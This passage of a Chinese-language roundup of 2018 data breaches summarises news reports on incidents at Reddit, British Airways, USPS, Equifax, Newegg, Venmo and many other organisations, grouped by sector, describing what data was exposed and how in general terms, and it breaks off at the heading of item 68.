此漏洞是AtlasLane公司的首席执行官TreverFaden在创建了一个名为C*ckblocked的网站后发现的,他的网站在输入Grindr用户名和密码后可查看谁屏蔽了他们。但用户登录成功后,Faden就可以访问用户档案中没有公开的用户数据,包括未读消息、电子邮件地址、删除的照片以及用户的位置信息。

Grindr为全球最大的同性社交网站,今年1月初被北京昆仑万维科技股份有限公司收购,其拥有的用户超过几百万遍布234个国家。

(二十一) 社交新闻网站Reddit遭黑客攻击,2007年之前的备份数据泄漏

2018年8月,美国社交新闻网站Reddit周三宣布,该公司的几个系统遭到黑客入侵,导致一些用户数据被盗,其中包括用户目前使用的电子邮箱以及2007年的一份包含旧加密密码的数据库备份。

Reddit称,黑客获取了旧数据库备份的一个副本,其中包含了早期Reddit用户数据,时间跨度从2005年该网站成立到2007年5月。Reddit表示,此次攻击是通过拦截员工的短信实现的,该短信中包含了一次性登录码。该公司还补充道,他们已经将此事通知受影响的用户。

(二十二) 实时聊天供应商被黑,致使西尔斯、达美航空、百思买用户信用卡泄漏

2018年4月,美国百货连锁公司西尔斯 (Sears)、达美航空 (Delta Airlines) 以及百思买 (Best Buy) 因共用的软件提供商被黑而导致客户的支付卡详情遭暴露。

这家被黑的公司位于美国加州圣荷西,提供多种客户支持服务,包括实时聊天系统和人工智能聊天机器人等。

达美航空公司表示,攻击者设法窃取的信息包括持卡人姓名、地址、卡号、CVV号码以及有效期。但该公司虽然并未说明受影响的乘客人数有多少,但表示攻击者并未获得访问护照或政府身份详情的权限,同时也未获得访问托管在 SkyMiles 计划中的数据的权限。

(二十三) 亚马逊解雇擅自向第三方商家披露用户信息的员工

2018年10月,亚马逊称公司解雇了一名擅自向网站上的第三方商家披露消费者电子邮件地址的员工,该员工的行为违反了亚马逊的政策。亚马逊发言人在声明中说:“须对此事负责的个人已被停职,我们支持执法部分采取诉讼。”

根据发送给消费者的通知,亚马逊已经提醒购物者但表示并不需要采取更改密码等措施。公司并没有披露受影响消费者数量。

(二十四) 亚马逊因“技术错误”泄漏部分客户信息,包含姓名、邮件地址

2018年11月,据外媒报道,亚马逊向受影响客户发送的电子邮件显示,由于“技术错误”导致一些客户的姓名和电子邮件地址遭到泄漏。周三上午,数人在网上分享了这些电子邮件的截图。

亚马逊在一份声明中说,“我们已经解决了这个问题,并通知了可能受到影响的客户。”

亚马逊没有回答有关有多少客户受到这一错误的影响,也没有回答有关信息公开时间的问题。亚马逊一位发言人告诉CNBC,亚马逊的网站和系统都没有被破坏。该公司没有透露客户信息的可见位置。

五、 交通物流
(二十五) 38万笔用户支付信息失窃,英国航空公司道歉

2018年9月,英国航空公司7日为乘客信息失窃道歉,承诺将赔偿遭受经济损失的用户。英国政府已知道这起“网络攻击”,正调查事件经过。

据英航的母公司国际航空集团6日透漏,8月21日至9月5日,英航网站及手机应用程序遭受“黑客”攻击,涉及大约38万笔用户网上支付交易;用户姓名、住址、电子邮箱账号、信用卡卡号及有效期、安全码泄露,航班信息和护照信息没有失窃。

英航董事长克鲁斯告诉记者,黑客作案手法“极其复杂”,为英航在线运营20多年来所未见。黑客没有破坏英航加密系统,而是用“另一种非常复杂”的方式侵入英航系统并获取用户信息。

(二十六) 澳洲最大汽车共享服务公司GoGet被黑客入侵,会员信息惨遭泄漏

2018年2月,GoGet公司向其客户发出警告,称他们的车辆预定系统在去年遭到了黑客的入侵,在去年7月27日之前注册的会员个人信息已经遭到泄露。

GoGet是澳大利亚首家,也是规模最大的一家汽车共享服务公司,业务覆盖澳洲五大主要城市,这包括:悉尼、墨尔本、堪培拉、布里斯班和阿德莱德。

泄露信息的多少取决于GoGet用户在填写会员登录表时录入的具体个人资料内容,这可能包括:姓名、家庭住址、电子邮箱地址、电话号码、出生日期、驾驶执照详细信息、就业单位、紧急联系人的姓名和电话号码以及GoGet管理帐户详细信息。

(二十七) 航运巨头马士基旗下子公司近半员工个人信息泄漏

2018年3月,根据《丹麦海军时报(MaritimeDanmark)》的报道,航运公司SvizterAustralia有大约500人受到了数据泄露事件的影响,而遭到泄露的个人信息可能包括税务档案号码、亲属详情以及退休金账户信息。

初步调查结果显示,在2017年5月该公司的三个关键电子邮箱账户遭到了匿名黑客的入侵,约6万封电子邮件被秘密地自动转发到了两个公司外部电子邮箱账户。

Svitzer的通信主管Nicole Holyer表示,该公司在今年3月1日收到了警告后阻止了黑客的电子邮件盗窃行为。另根据Holyer的说法,该公司使用由第三方电子邮件服务提供商托管的服务,目前该公司已经向提供商送达了法院命令,以向调查人员提供访问权限。

(二十八) 美国邮政局修复API漏洞,6000万用户个人信息或受影响

2018年11月,据报道,美国邮政局(USPS)周三发布补丁修补了一个API漏洞。攻击者可在该API的“帮助”下,利用任何数量的“通配符”搜索参数获取其他用户的大量数据:从用户名、账号到实际地址和联系方式等等。该漏洞可允许任何拥有USPS.com账户的人查看其他用户账户,大约有6000万美国邮政用户受该安全漏洞影响。

根据Kerbs on Security的报道,这个漏洞在一年前由一名独立的安全研究员首次发现,该研究员随后告知了美国邮政局,然而从未获得任何回复,直到上周Krebs以该研究员名义联系了美国邮政局。

(二十九) 南非再次遭遇数据泄露:近100万公民个人信息网上曝光

继2017 年南非遭遇一起大规模的数据泄露事故,2018年5月,这个国家又发生了一起数据泄露,导致 93.4 万人的个人记录在网络上被曝光。本次曝出的数据,涵盖了国民身份证号码、电子邮件地址、全名、以及明文密码。

南非 eNATIS 驾照人数统计(2017 年 3 月)

在专家帮助下,外媒厘清了数据泄露与南非一家负责在线支付罚款的公司有关。被泄露的数据库,是在一个公共网络服务商上被发现的,系统属于一家处理南非电子交通罚款的公司。

(三十) 尼日利亚最大航空公司Arik Air云泄露大量乘客数据

2018年11月初,据尼日利亚当地媒体《优质时报(Premium Times)》报道,尼日利亚国内最大的航空公司Arik Ai公布的数据显示,该航空公司的大量乘客数据因为一个没有得到保护的亚马逊S3存储桶暴露在了网上。

根据Cloudflare的安全主管Justin Paine的说法,日前他在日常扫描活动中发现了一个包含大量CSV文件的亚马逊S3存储桶,而这些敏感文件很可能归Arik Air航空公司所有。

Justin Paine的分析显示,遭泄露的数据包含了乘客的姓名、电子邮箱地址、订购时的IP地址以及使用的信用卡哈希值。此外,还包括信用卡的信息、订购的日期、支付的金额、使用的货币类型、设备指纹以及出入境机场。

(三十一) 欧洲铁路系统遭遇黑客攻击,大量旅客数据泄露

2018年5月,旅行网站欧洲铁路(Rail Europe)公司向客户发布通告表示,有黑客入侵了该公司的机票预定网站,或已窃取了大量敏感数据。欧洲铁路北美有限公司(RENA)表示,因此次黑客事件可能泄露客户的个人信息包括:

姓名;
性别;
收件地址;
发票地址;
电话号码;
电子邮件地址;
信用卡/借记卡号码;
支付卡到期日期与验证值。
除此之外,某些注册用户的用户名与密码也可能遭遇外泄。更令人担忧的是,黑客已经在 RENA 系统当中驻留近三个月之久。RENA在2018年2月16日与银行联系时,开始意识到其欧洲铁路网站可能存在问题,直到5月才确认该泄露事件。

(三十二) 英国航空承认最近发生的网络攻击比想象中还要糟糕

2018年10月,据外媒报道,英国航空公司(British Airways)证实,发生于9月6日的网络攻击可能已经导致8月21日-9月5日之间的乘客的数据被盗。

在与网络法医专家和英国国家犯罪署合作之后,这家公司还发现,此次攻击之前,受影响的数据包含了7.7万张带有CVV银行卡和10.8万张没有CVV银行卡的姓名、账单地址、电子邮箱地址、卡号、卡有效期。

虽然现在还没有证据表明黑客将银行卡信息用于不法活动,但这起事件还是突显出了即便像英国航空这样的大公司其网络安全状况同样也令人担忧。

(三十三) 中东打车巨头Careem被黑,1400万乘客信息失窃

2018年4月,一家位于迪拜的叫车公司Careem向媒体透露称该公司遭遇了网络攻击并造成了数据泄露。黑客盗取的数据包括用户的姓名、电子邮箱地址、手机号、和行程数据,所有在今年1月14之前注册过Careem的用户都受到了影响。据Careem称,目前无迹象表明黑客有获取到用户的密码和信用卡号。

该数据泄露事件涉及到的用户包括55.8万名司机和1400万乘客。Careem目前在全球13个国家运营,覆盖90个城市。Careem曾宣布其在土耳其和巴基斯坦等国处于市场领先地位。

六、 教育
(三十四) 加拿大亚岗昆学院服务器感染恶意软件,超过11万条记录泄露

2018年7月,位于加拿大安大略省的亚岗昆学院发布了一份声明,通报了一起影响到人数众多的大规模数据泄露事件。此次黑客入侵事件最初发生在2018年5月16日,亚岗昆学院的服务器被发现感染了恶意软件。

该学院已经确认了4568名个人,包括学生和校友,可能遭泄露的数据包括出生日期和家庭住址。另有106931名个人,包括学生、校友以及现任和前任员工,可能遭泄露的信息是一些公开的非敏感信息。学院已经就此事通知了安大略省信息和隐私专员以及渥太华警察局。

(三十五) 教育网站存漏洞,俄罗斯1400万大学毕业生个人信息泄漏

俄罗斯技术社区网站Habrahabr上,一名昵称为NoraQ的用户(黑客)2018年1月29日发文称,1400万名俄罗斯大学毕业生信息泄露。俄罗斯总人口数量约为1.46亿,即十分之一俄罗斯人的信息泄露。泄漏信息包括姓名、出生日期、个人账户的保险号码、纳税人识别号码、电子邮件地址等,文件大小约为5GB。

NoraQ在俄罗斯联邦教育科学联督局服务网站上发现了一个SQL注入漏洞,通过这个漏洞他下载了上述1400万名毕业生信息。

(三十六) 全美最大公立网校FLVS遭遇数据泄露,近37万师生受影响

2018年3月14日,佛罗里达虚拟学校(Florida Virtual School,简称FLVS),在一份声明中表示,近37万名师生的个人敏感信息可能已经遭到了外泄,以及2000多名教师可能会因此受到影响。可能泄漏数据包括学生的姓名、出生日期、学校帐户用户名和密码,以及其父母的姓名和电子邮件地址。

FLVS成立于1997年,是全美第一所也是最大的一所公立虚拟学校。FLVS表示,他们的IT人员在2月曾发现一台服务器存在严重的配置错误问题,这导致该服务器对于黑客来说是“完全开放”的。

目前,FLVS已经将此事通报给了政府执法部门。除此之外,FLVS还将会为受影响的师生提供为期一年的年度免费信用监控服务。

(三十七) 数据泄露影响超过1000万公民,马来西亚教育部SAPS系统紧急下线

2018年6月,据马来西亚媒体Malay Mail报道,在发现存在一个可能暴露超过1000万公民个人信息的安全漏洞之后,由马来西亚教育部推出的学校考试分析系统(SitemAnalisis Peperiksaan Sekolah,SAPS)被迫紧急下线。

报道指出,一位要求匿名的读者在上周五晚向Malay Mail爆料称,教育部此前无视他的警告,迫使他不得不向媒体寻求帮助。之后,他向马来西亚计算机紧急响应小组(MyCERT)进行了通报。MyCERT 在周六中午对Malay Mail出了回应,该系统之后也在同一天被下线。

“这是一个很好的系统,但是它的后端完全失败,他们存储了数以百万计学生的细节记录,但是他们从不隐藏这些信息。一些非常个人的细节可以未经允许被访问,他们只是忽略了它。”这位匿名读者报料说,“这个系统从上线第一天起就存在漏洞。”他还抱怨登录机制是“一个彻头彻尾的笑话”,因为密码存储在一个纯文本文档中,没有进行任何加密处理。

(三十八) 因员工发错邮件,普渡大学2.6万名学生详细信息暴露

2018年5月,美国印第安纳州西拉法叶市的普渡大学(PurdueUniversity)发生了一起数据泄露事件,恰恰就只是因为一名工作人员一不小心犯下的一个低级错误导致的。据报道,在这起数据泄露事件中,所涉及的数据超过2.6万条。

在解释这一事件时,普渡大学助理法律顾问Trent Klingerman表示,该校的一名工作人员原本计划是要发送一份与财政援助计划有关的宣传手册,但无意中将包含学生个人信息的表格发送给了学生的家长。邮件附件是一个Excel文件,包含了超过2.6万名学生的数据。

七、 金融
(三十九) AWS存储桶泄露50.4GB数据,美国消费金融巨头受影响

2018年3月,云安全厂商 UpGuard 公司网络风险小组发现一批由于 Amazon Web Services(简称AWS)S3存储桶未受保护而泄露的50.4GB数据。经证实,此AWS存储桶属于云商务智能(简称BI)与分析厂商 Birst 公司。

这50.4 GB数据涉及Birst公司主要客户Capital One(一家位于弗吉尼亚州麦克莱恩市的金融服务巨头,亦为全美第八大商业银行),包含 Capital One 网络基础设施配置信息以及 Birst 公司的设备技术信息。

根据 UpGuard 公司发布的官方博文,这批数据当中包含密码、管理访问凭证以及私钥,且专供Birst公司内部云环境中的Capital One 相关系统使用。攻击者利用这批遭到泄露的数据足以掌握 Capital One对 Birst 设备的使用方式,进而入侵 IT 系统并深入挖掘该公司的内部资讯。

(四十) Delta、Sears供应商遭网络攻击,数十万名客户信用卡信息可能曝光

2018年4月,据外媒报道,Delta和Sears发布声明称,相关曝光的数据泄露事件可能泄露了数十万客户的信用卡资料。上述数据泄露事件最先由路透社曝出,其发生的地点为一家同时为Delta和Sears在线聊天平台提供服务的公司。

目前,联邦执法部门、银行以及IT安全公司正在对这一安全事件进行调查。而Sears和Delta都分别开设了针对此事件的客户通道,前者开通了一个客户咨询热线,后者设立了一个专用解答网页delta.com/response。

(四十一) NAS配置不当,保险公司大量敏感数据泄露

2018年1月19日,UpGuard网络风险研究主任Chris Vickery留意到了美国马里兰联合保险协会(MDJIA),因为他发现了属于该保险协会的一个联网存储(NAS)设备,该设备通过一个开放端口与互联网连接,而它内含与协会IT运营的重要敏感数据。因存储设备的错误配置,将数千客户的信息泄露到网上。

与被泄数据存储一起被曝光的是JIA客户文件和声明的备份,包括客户姓名,地址,电话号码,生日以及社保号,支票扫描件,银行账号和保险单号。除了这些重要的客户信息,这次泄露还曝光了一个内部访问凭证数列,它原本用于管理和控制MDJIA协会的运营,包括远程桌面,邮件,第三方用户名和密码。

(四十二) PayPal旗下移动支付服务Venmo默认公开用户交易信息(已遭滥用)

2018年7月,一名隐私提倡者Hang Do Thi Duc发布最新调查结果表示,多数 Venmo 交易被记录在任何人均可访问的一个公共 API 中,原因是 Venmo app 的默认设置为所有用户设置为“公开”。他通过这一隐私策略查询 Venmo API 并下载了该公司所有2017年的公开交易记录,总计 207,984,218 条。

除非用户特别更改了这个值,否则他们通过 Venmo 转账 app 做出的所有交易都被记录且任何人均可通过 Venmo 公共 API 遭访问。通过这个 API 暴露的数据包括发送人和收款方的姓和名、Venmo 头像、交易日期、交易留言、交易类型等。据悉,Venmo 是一款仅在美国使用的移动支付应用,于2009年推出。2013年,Venmo 成为 PayPal 子公司。

(四十三) 澳大利亚联邦银行遗失了1200万条用户银行数据

2018年5年,外媒BuzzFeed报道,澳大利亚第一大商业银行澳大利亚联邦银行(CBA)证实,包含客户姓名、地址、账号和2000年至2016年的交易详情记录的两个存储磁带,在一次数据中心转运任务中被其分包商Fuji-Xerox丢失。其中至少包含1200万名用户的银行交易数据。

当银行意识到这起事件时,其委托三方统计公司毕马威(KPMG)进行过一次独立的剖析调查,以了解具体情况,并通知了澳大利亚信息专员办公室(OAIC)。毕马威(KPMG)在调查后发现存储带很有可能已被处置,很难寻回。

(四十四) 超2万张银行卡数据在暗网兜售,几乎涵盖巴基斯坦国内所有银行

2018年11月,据巴基斯坦GEO电视台报道,几乎所有巴基斯坦银行在最近都受到了黑客入侵的影响,而这一令人震惊的消息已经在上周得到了巴基斯坦联邦调查局(FIA)网络犯罪部门负责人的证实。

根据俄罗斯网络安全公司Group-IB最近发布的一份报告,其在暗网上发现一批数据,包含了超过2万张巴基斯坦银行卡的详细信息,而这些数据归属于在该国运营的“大多数银行”的客户。巴基斯坦PakCERT的专家认为,这些数据是通过银行客户的刷卡行为获得的。这些支付卡数据正在暗网出售,售价从100美元至160美元不等。

(四十五) 黑进上百家美国企业窃取1500万张信用卡记录,三名乌克兰黑客被捕

2018年8月,据外媒报道,三名乌克兰公民近日因参与一项针对100多家美国企业的长期网络攻击行动而被捕。根据起诉书了解到,该团伙在过去总共从6500多个销售点终端盗取了超1500万张信用卡记录。据安全研究人员介绍,这个叫做Carbanak的团伙利用社交工程和网络钓鱼攻击渗入到企业并从中盗取金融数据。

最初的感染主要通过恶意软件诸如电子邮件附件或有时候假装丢失酒店预订信息或SEC(美证券交易委员会)投诉文件展开。

现在,Dmytro Fedorov、Fedir Hladyr、Andrii Kolpakov被控犯有阴谋罪、电信欺诈罪、计算机黑客罪、访问设备欺诈罪、严重身份盗窃罪等26项罪名。

(四十六) 汇丰银行美国分部发生非授权访问和数据泄露

2018年11月,汇丰银行(美国)通知客户10月4日至10月14日期间发生了数据泄露,攻击者访问了访问该金融机构的在线账户。

泄露的信息包括:客户全名,邮寄地址,电话号码,电子邮件地址,出生日期,帐号,帐户类型,帐户余额,交易历史记录,收款人帐户信息以及可用的帐单历史记录。

为应对安全漏洞,汇丰银行的美国子公司暂停了在线账户访问以防止滥用。数据泄露后,汇丰银行加强了个人网上银行的认证流程,增加了额外的安全保障。

(四十七) 加拿大两家银行遭黑客勒索,9万名客户信息被盗

2018年5月,据加拿大《环球邮报》报道,两家加拿大银行——蒙特利尔银行(Bank ofMontreal)和网上银行SimpliiFinancial——都对外表示遭到黑客袭击,并且发出警告称,袭击两家银行的黑客声称已经访问了客户的账户以及相关个人信息,并威胁将公开这些数据。约9万名客户信息被盗,这可能是加拿大金融机构遭受的首次重大攻击。

蒙特利尔银行的发言人表示,事件之后收到了攻击者的威胁,称若不支付100万赎金就将公开被盗客户数据。此次两家银行遭受的袭击事件似乎是相关联的。该行表示,目前正在进行彻底调查并且已经告知所有相关联的机构来评估潜在的损失。

(四十八) 离职员工窃取客户联系人名单,SunTrust银行150万客户信息泄露

2018年4月,美国SunTrust银行证实,在一名离职员工偷窃了该公司的客户联系人名单之后,超过150万名客户的个人信息可能已经因此遭到泄露。

SunTrust银行的首席执行官William Rogers称,这属于团伙作案,这名离职的前员工通过与第三方合作成功对公司的客户联系人名单进行了盗窃。名单包含的客户个人信息包括客户的姓名、地址、电话号码以及某些账户余额。

Rogers表示,SunTrust银行正在积极配合第三方安全专家和执法部门进行事件调查。尽管调查工作仍在在进行中,但出于对客户负责,SunTrust银行正在主动通知约150万名客户。

(四十九) 美国征信公司信息泄露事件升级,新增240万受害者

2018年3,据报道,美国征信公司伊奎法克斯(Equifax)表示,关于2017年9月曝出的1.4亿用户个人信息泄露事件,近日又发现另外240万名受害者。

伊奎法克斯称,之前未发现新的受害客户,是因为他们的社会安全号码并未与部分驾照资讯一同被窃取。而社会安全号码似乎是被黑客攻击的重点。该公司还表示,将会通知这些用户,并为他们提供防盗保护和信用报告监控服务。

(五十) 新蛋网用户信用卡数据泄漏:恶意代码已侵入约1个月

2018年9月下旬,据报道,在过去约1个月的时间,购物网站新蛋(Newegg)的用户数据发生泄露事故,目前新蛋正在对网站进行整理改进。

有安全研究人员发现,黑客将15行恶意盗刷代码植入新蛋网支付页面,从8月14月-9月18日,代码一直存在。这种恶意代码从用户手中窃取信用卡数据,传输到由黑客控制的服务器。黑客的代码同时影响桌面端和移动端用户,只是目前还不清楚移动端用户是否已经受到影响。安全研究人员指出,攻击新蛋网的方式十分巧妙,伪装极好,与英国航空公司(British Airways)信用卡泄露事件、以及之前发生的Ticketmaster泄露事件有些类似。

(五十一) 智利1.4万信用卡资料被黑客组织盗取

2018年7月,根据智利政府公布的消息,黑客盗取了智利约1.4万张信用卡的资料,并将这些资料公布在社交媒体上。

据报道,在这起案件中,黑客公布了信用卡卡号、有效期限及安全码,受攻击影响的银行包括桑坦德银行(Santander)、伊塔乌银行(Itau)、丰业银行(Scotiabank)和智利银行(Banco de Chile),这些银行已通知客户遭入侵一事。

智利政府的银行监管机构表示,这起袭击行动是黑客组织“影子经纪人”(Shadow Brokers)展开的,该组织因入侵美国国家安全局(NSA)而闻名。

(五十二) Dark Overlord黑客发布了第一批“秘密”911文件

据雷锋网报道,2018年12月31日,黑客组织DarkOverlord在一篇发表于源代码分享网站Pastebin上的帖子中威胁称:

他们已经从一家为保险公司Hiscox Syndicares Ltd.提供咨询服务的律师事务所窃取到文件。事后,律师事务所与黑客组织达成了赎回协议,并确定对方按协议缴纳赎金即可拿回全部数据。但是,该律师事务所并未履行诺言,向执法部门进行了报告。

2019年1月初,Dark Overlord竟然真的公布了大约70M的911恐怖袭击相关资料,同时第一批解密密钥被公之于众。

八、 军事

(五十三) 超过两万名美国海军陆战队队员个人资料遭意外泄露

2018年3月,根据美国海军陆战队机关报《海军陆战队时报(Marine CorpsTimes)》的报道,约21, 426名海军陆战队士兵、水手和其他相关工作人员的个人敏感信息被意外暴露给了外界。泄露信息包含大量高度敏感的信息,例如社会安全号码、银行电子资金转账记录和银行转账号码、信用卡信息、家庭住址以及紧急联系信息等。

报道称,事件原因已查明,在2月26日早上,美国国防部的自动监护旅游系统(Defense Travel System,DTS)将一封未加密的电子邮件发送给了一份错误的电子邮箱地址列表。未加密的电子邮件不仅被无意中发送给了民用帐户,而且还被发送给了在未分类的海军官方域名“usmc.mil”上托管的帐户。目前,还不清楚有多少人收到这封电子邮件。

(五十四) 美空军“死神”无人机文件泄露

2018年7,威胁情报公司 Recorded Future 发布报告指出,其2018年6月发现有黑客在暗网出售美国空军MQ-9 Reaper(“死神”) 无人机的相关文件,这份文件包含与MQ-9 Reaper 相关空军人员名单、无人机维护和培训资料。经研究人员调查确认,这些文件是真实的。

研究人员调查发现,这名黑客通过先前披露的 FTP 漏洞访问了美国 Creech 空军基地一台 Netgear路由器,从而获取了这些文件。而事件中,同样遭遇入侵的一名上尉,2018年2月刚完成了网络安全培训,理应了解防止非授权访问的必要操作。

(五十五) 女童子军信息泄露事件中2800名成员个人信息外泄

2018年11月,黑客入侵美国加利福尼亚州橙县女童子军分部,2800名女童子军及其家庭成员个人信息可能遭泄露。据橙县女童子军称,某未知威胁者于9月30日至10月1日实施入侵,获取了该童子军分部运营的电子邮箱账户的访问权限,并用其发送邮件。

据女童子军分部(GSOC)称,该账户之前用于为女童子军成员安排出行,因此,黑客可通过访问该账户获取个人数据。经确认,黑客或已窃取部分成员姓名、出生日期、家庭住址、保险单号及健康病历。专家警告,外泄信息可能被用来进行基于社会工程学的网络攻击。

(五十六) 热门无人机交易网站数据库泄露,致使英国军方警方政府单位的购买记录曝光

2018年4月,热门无人机交易网站 DronesForLess.co.uk 将未加密的整个交易数据库暴露在网上,导致数千名警方、军方、政府和私人客户的购买记录遭曝光。Secret-bases.co.uk 公司的 Alan 发现了这起事件,他指出,DronesForLess.co.uk 的运营人员未能保护 web 基础设施的关键部门免遭好奇之人的窥探。

约1万多份购买收据存储在该网站的 web 服务器中。收据详情包括购买人姓名、地址、电话号码、邮件地址、IP 地址、用于连接到该网站的设备、下单商品详情、发卡行以及付款用的信用卡的后四位数字。涉及的客户名称包括伦敦警察厅、英国陆军预备役少校、英国国防部采购部门某员工、英国国家犯罪局某员工、英国国防科技实验室、英国陆军步兵试验和开发部队 (Infantry Trials and Development Unit)。

(五十七) 英国空军遭遇黑客攻击,F-35隐形战机数据疑泄露

英国《每日邮报》2018年8月6日报道,英国皇家空军F-35B 战机的部分信息已经泄露!英国计划从美国购买138架该型战机,皇家空军和海军航空兵都将装备。

然而,英国皇家空军一名女军人的手机约会应用软件 Tinder 账户被黑客入侵,黑客在获取她的信息后,开始以她的身份与一名男同事(空军)联系,聊起了两个月前刚抵达英国的 F-35A 隐身战机。

尽管这名女军人很快就发现自己的账号被盗用了,但还是晚了。从黑客与那名男同事的聊天记录来看,黑客非常得心应手用各种语言陷阱,从那名男同事那里套取了 F-35B 战机的部分信息,其中不乏机密信息。

(五十八) 中东地区政军企高层遭钓鱼间谍攻击,攻击者已收集逾30GB数据

2018年5月,根据Lookout 安全公司发布的报告,攻击者使用“Steal Mango”等监控软件工具成功地攻陷政府、军方、医疗等人员的移动设备,已经收集了超过30G的受攻陷数据,包括通话记录、音频记录、设备位置信息以及文本信息。某钓鱼攻击活动通过自定义监控软件感染安卓设备,从多个国家尤其是中东地区的高层提取数据。

Lookout 公司表示,约100台独立设备遭针对性监控活动的影响,包括政府官员、军方人员的设备,以及位于巴基斯坦、阿富汗、印度、伊拉克和阿联酋等地的活动家。其它国家如美国和德国的官员数据也遭收集。

九、 生活服务
(五十九) GDPR施行后,英国电子零售商DixonsCarphone公布严重数据泄露事件

2018年6月,英国家喻户晓的手机零售商 DixonsCarphone 宣布,正在调查“对公司所持有的某些数据的越权访问”。该公司指出该越权访问“试图攻陷Currys PC World 和 Dixons Travel 商店中其中一个处理系统中的590万张卡”,“以及包含非金融个人数据的120万个记录,如姓名、地址或邮件地址”。

这可能是英国历史上发生的规模最大的数据泄露事件。

如果整个事件被按 GDPR 规定处理,那么 ICO 可能会对 Dixons Carphone 开出全球年收入总额的4%的罚单。去年,该公司的年销售总额为105亿英镑(折合140亿美元)。根据 GDPR 开出的罚单可能达到数亿英镑。

(六十) 阿迪达斯可能泄漏了数百万美国消费者信息,官方称正在调查

2018年6月,德国运动品牌阿迪达斯在网站上发布通知称,未授权人员声称获得对消费者数据的访问权限,数百万名美国消费者或受影响。

未经授权人员可能已获得访问在阿迪达斯美国网站上购物的消费者用户名、密码哈希和通讯信息的权限,该公司将它们称之为“有限信息”。阿迪达斯向某些媒体机构表示事件可能影响“数百万”消费者,但它发布声明称并非所有位于美国的消费者均受影响。

(六十一) 法国眼镜连锁店Optical center因泄露用户数据被罚25万欧元

2018年6月,据《费加罗报》报道,法国眼镜连锁店 Optical center 因泄露用户数据,被法国独立机构信息与自由委员会( Cnil )罚款25万欧元(约合人民币188.66万元),该金额创造了Cnil 最高罚款记录。

法国当局表示,这是 Cnil 首次开出如此高金额的罚单。2017年7月,Cnil 接到相关举报后查证,Opticalcenter 的用户可以通过其网站主页看到其他客户的购物发票。这些发票包含姓名、邮箱地址和视力矫正度数等一些私人信息,部分发票上还有用户的社保帐号。

据悉,法国2016年颁布的个人信息数据保护法使得Cnil 的惩罚权限,由15万欧元上调至300万欧元;而GDPR,让这一数字上调至2000万欧元和营业额的4%。

(六十二) 健康应用PumpUp服务器未设密码,超过600万用户个人信息暴露

2018年6月,据外媒ZDnet报道,位于加拿大安大略省的PumpUp公司发布声明称,旗下同名社交健康追踪应用无意中暴露了用户的隐私和敏感数据,包括用户之间发送的健康信息和私人消息。

PumpUp公司在全球拥有超过600万用户。其数据都被存储在一个核心的后端服务器,并托管在亚马逊的云端。然而,安全研究员Oliver Hough发现,该服务器并没有设置密码,这使得任何人都能够查看都有谁在进行登录、谁在实时发送消息以及消息的内容。

ZDnet指出,暴露的数据主要包括用户的电子邮箱地址、出生日期、性别和用户所在位置的地理信息,以及用户的生物特征、锻炼和活动目标、用户头像,还有用户是否已经被屏蔽、是否对应用进行了评分。此外,该应用还暴露了用户提交的健康信息,如身高、体重、咖啡因和酒精摄入量、吸烟频率、健康问题、药物和受伤处等。

(六十三) 酒店预订软件FastBooking被黑,数百家酒店旅客入住和支付信息泄露

2018年6月,数百家酒店的旅客个人详情和支付卡数据被盗,而数据是从巴黎公司FastBooking 被盗的。该公司向全球100个国家的4000多家酒店出售酒店预订软件。

FastBooking 公司称,事件发生在6月 14日,当时攻击者利用托管在服务器上某个应用中的漏洞安装恶意工具(恶意软件)。该工具可导致黑客远程访问服务器以提取数据。6月19日FastBooking 员工发现数据遭泄露,并在不到6小时的时间里解决了该问题。

FastBooking 公司指出,黑客窃取的信息包括旅客的姓氏和名字、国籍、邮政地址、邮件地址以及和酒店预订相关的信息(酒店名称、入住和离店详情)。在某些情况下,某些支付卡详情也被盗,如打印在支付卡上的姓名、卡号及其有效期。

(六十四) 美国Chili’s连锁餐厅支付系统被黑,用户支付卡信息遭破坏

2018年5月布林克国际公司发现其旗下Chili’s连锁餐厅1600家门店的顾客支付卡信息受到破坏,这可能导致部分餐厅顾客的支付卡相关信息被非法访问或盗窃。经初步调查,这一恶性事件发生的时间范围为2018年3月——4月。

Chili’s考察后确定这是由于有人将恶意软件放置在餐厅销售点的机器内,使得同伙可以从他们的相关支付系统中删除在餐厅消费顾客的支付卡信息(包括信用卡、借记卡、卡号及持卡人姓名)。

Chili’s当前正与一个外部取证技术团队合作,以尽快确定信息缺口的性质及全部范围。与此同时,以最快速度向顾客发布了通知,承诺尽可能提供欺诈解决和信用监控服务,还给出了详细具体的参考安全建议。

(六十五) 美国连锁餐厅Applebee被黑,160多家门店POS系统支付信息泄漏

2018年3月,根据RMH特许经营控股(RMH Franchise Holdings)在其网站上发布的公告来看,部分由RMH拥有和经营的Applebee餐厅的销售点(POS)系统被匿名黑客安装了恶意软件,旨在窃取消费者的支付卡信息。这意味着消费者的姓名、支付卡号码、以及在限定时间内处理的卡片验证码可能因此遭到了泄露。

RMH透露,这起事件是在2月13日被发现的。在得知潜在事件后,RMH立即展开了调查并获得了网络安全取证公司的帮助。根据公告显示,事件影响了位于阿拉巴马州、亚利桑那州、佛罗里达州等14州的160多家Applebee餐厅,这几乎代表了RMH拥有和经营的所有餐馆。

(六十六) 美国奢侈品巨头Saks Fifth Avenue遭黑客攻击,500万张银行卡信息被盗

2018年4月,根据安全公司Gemini Advisory披露,奢侈品百货连锁Saks Fifth Avenue (萨克斯第五大道精品百货店)已证实遭受攻陷,500万购物者的银行卡信息遭泄露。初步分析表明犯罪分子窃取数据的时间实在2017年5月至今。从目前对可用数据的分析来看,除了Saks FifthAvenue,Lord &Taylor的实体店整个网络同样遭攻陷。而黑客组织 Fin7 炫耀称其攻陷了 Saks 的计算机系统。

Gemini Advisory 指出,由于 Saks 的客户是高收入群体,因此被盗的银行卡对于欺诈者而言价值尤高,因为高收入群体的支付卡盗用情况难以检测。

(六十七) 美国线上旅行社Orbitz遭遇黑客攻击,88万客户个人资料或已泄露

2018年3月22日,据国外综合新闻平台PhocusWire的报道,美国在线旅游巨头Expedia旗下的在线旅行社Orbitz公司在本周二公开宣布称,其在线旅游预定平台存在一个严重的安全漏洞,而这个漏洞可能会使得大约88万名Orbitz客户面临数据泄露风险。

信息泄露所涉及到的客户是那些于2016年上半年在Orbitz预定平台以及于2016年至2017年在Orbitz商业合作伙伴平台进行订单交易的客户,存在泄露风险的信息可能包括姓名、支付卡信息、出生日期、电话号码、电子邮件地址、帐单地址和性别等。

根据Expedia的说法,这个漏洞是该公在司对Orbitz的商业合作伙伴Travelocity运行的平台进行调查时发现的,而Orbitz平台和该平台处于相同的环境中。

(六十八) 美国最大面包连锁店Panerabread泄露数百万顾客隐私长达八个月

